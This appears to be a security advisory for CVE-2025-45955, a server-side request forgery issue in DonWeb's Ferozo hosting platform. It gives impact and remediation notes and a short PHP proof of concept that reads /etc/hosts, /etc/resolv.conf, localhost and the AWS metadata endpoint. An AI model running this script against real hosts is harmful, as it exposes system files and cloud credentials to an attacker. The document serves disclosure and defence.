# CVE-2025-45955
#  Server-Side Request Forgery in DonWeb Ferozo (CVE-2025-45955)

## Description

An attacker can exploit this vulnerability by uploading and executing a specially crafted PHP file on the Ferozo hosting platform. When accessed, the file launches a series of SSRF attempts targeting internal services (such as `127.0.0.1`, `169.254.169.254`, or service mesh endpoints), local files (e.g., `file:///etc/passwd`), and known cloud metadata endpoints. The script collects responses or error messages, allowing the attacker to map internal infrastructure, enumerate accessible services, and gather sensitive information for further exploitation. 


##  Proof of Concept (PoC)

The following code demonstrates the vulnerability:

```php
<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
```
###  Affected Component  
- Ferozo Hosting Platform (DonWeb)
- PHP-based environments that allow user-uploaded or user-controlled PHP file execution 

---

###  Impact  
- **Information Disclosure**: Leaks internal IPs, file contents, cloud metadata endpoints  
- **Infrastructure Reconnaissance**: Enables port and service enumeration (Docker, Kubelet, etc.)  
- **Cloud Exploitation Potential**: Probes known metadata endpoints such as AWS, GCP, and Alibaba  
- **Chaining Opportunity**: Can be paired with other local vulnerabilities for RCE or pivoting  

---

###  Remediation  
- Restrict file inclusion and URL access functions (`file_get_contents`, `fopen`, etc.)  
- Block access to internal IP ranges (`127.0.0.0/8`, `169.254.169.254`, etc.) via outbound firewall rules   
- Audit and sanitize user inputs that may influence file paths or URLs  

---

### CVE ID  
**CVE-2025-45955**  

---

### Discoverer  
*Reported by [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]*
